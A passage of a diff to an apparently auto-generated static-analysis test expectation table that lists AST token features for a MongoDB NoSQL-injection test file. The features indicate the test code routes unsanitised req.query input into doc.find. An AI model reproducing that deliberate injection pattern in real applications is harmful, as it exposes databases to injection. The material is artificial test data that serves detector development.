enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:27 | db.collection | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:27 | db.collection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | db.collection('doc') | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | db.collection('doc') | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | db.collection('doc') | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | exceptional return of db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | exceptional return of db.collection('doc') | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | exceptional return of db.collection('doc') | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:15:95:34 | exceptional return of db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:18:95:27 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:18:95:27 | collection | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:18:95:27 | collection | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:18:95:27 | collection | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:18:95:27 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:29:95:33 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:29:95:33 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:29:95:33 | 'doc' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1925,6 +10333,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:29:95:33 | 'doc' | enclosingFunctionName | useParams | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:29:95:33 | 'doc' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:95:29:95:33 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:7 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:7 | doc | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:7 | doc | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:7 | doc | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:7 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:12 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:12 | doc.find | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:12 | doc.find | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:12 | doc.find | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:12 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | doc.find(query) | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | doc.find(query) | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | doc.find(query) | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | exceptional return of doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | exceptional return of doc.find(query) | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | exceptional return of doc.find(query) | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:5:98:19 | exceptional return of doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:9:98:12 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:9:98:12 | find | contextSurroundingFunctionParameters | (params)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:9:98:12 | find | enclosingFunctionBody | params query id params id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:9:98:12 | find | enclosingFunctionName | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:9:98:12 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:14:98:18 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:14:98:18 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:14:98:18 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1933,6 +10366,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:14:98:18 | query | enclosingFunctionName | useParams | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:14:98:18 | query | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:98:14:98:18 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:102:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:102:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:102:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:102:8 | app.post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:102:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:102:8 | app.post | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:104:2 | app.pos ... ry);\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:104:2 | app.pos ... ry);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:104:2 | app.pos ... ry);\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:104:2 | exceptional return of app.pos ... ry);\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:104:2 | exceptional return of app.pos ... ry);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:1:104:2 | exceptional return of app.pos ... ry);\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:5:102:8 | post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:5:102:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:5:102:8 | post | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:10:102:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:10:102:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:10:102:26 | '/documents/find' | calleeImports | express | @@ -1940,6 +10388,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:10:102:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:10:102:26 | '/documents/find' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:10:102:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:102:28 | useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:102:28 | useQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:102:28 | useQuery | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:102:28 | useQuery | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:102:28 | useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | (req, r ... ery);\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | (req, r ... ery);\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | (req, r ... ery);\\n} | calleeImports | express | @@ -1947,11 +10405,197 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | (req, r ... ery);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | (req, r ... ery);\\n} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | (req, r ... ery);\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | exceptional return of anonymous function | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | return of anonymous function | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:29:104:1 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:30:102:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:35:102:37 | res | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:35:102:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:35:102:37 | res | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:35:102:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:102:35:102:37 | res | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:10 | useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:10 | useQuery | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:10 | useQuery | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:10 | useQuery | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:10 | useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | exceptional return of useQuery(req.query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | exceptional return of useQuery(req.query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | exceptional return of useQuery(req.query) | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | exceptional return of useQuery(req.query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | exceptional return of useQuery(req.query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | useQuery(req.query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | useQuery(req.query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | useQuery(req.query) | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | useQuery(req.query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:3:103:21 | useQuery(req.query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:14 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:14 | req | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:14 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:14 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:20 | req.query | CalleeFlexibleAccessPath | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:20 | req.query | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:20 | req.query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:20 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:20 | req.query | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:20 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:12:103:20 | req.query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:16:103:20 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:16:103:20 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:16:103:20 | query | enclosingFunctionBody | req res useQuery req query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:16:103:20 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:103:16:103:20 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | MongoClient | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | MongoClient | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | this | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | this | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | this | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:0 | this | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:1 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:1 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:1 | query | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:1 | query | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:105:1 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | 'arguments' object of function useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | 'arguments' object of function useQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | 'arguments' object of function useQuery | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | 'arguments' object of function useQuery | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | 'arguments' object of function useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | exceptional return of function useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | exceptional return of function useQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | exceptional return of function useQuery | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | exceptional return of function useQuery | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | exceptional return of function useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | functio ... });\\n} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | functio ... });\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | functio ... });\\n} | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | return of function useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | return of function useQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | return of function useQuery | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | return of function useQuery | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:1:114:1 | return of function useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:10:105:17 | useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:10:105:17 | useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:10:105:17 | useQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:10:105:17 | useQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:10:105:17 | useQuery | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:10:105:17 | useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:10:105:17 | useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:105:19:105:25 | queries | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:13 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query | contextSurroundingFunctionParameters | | +| 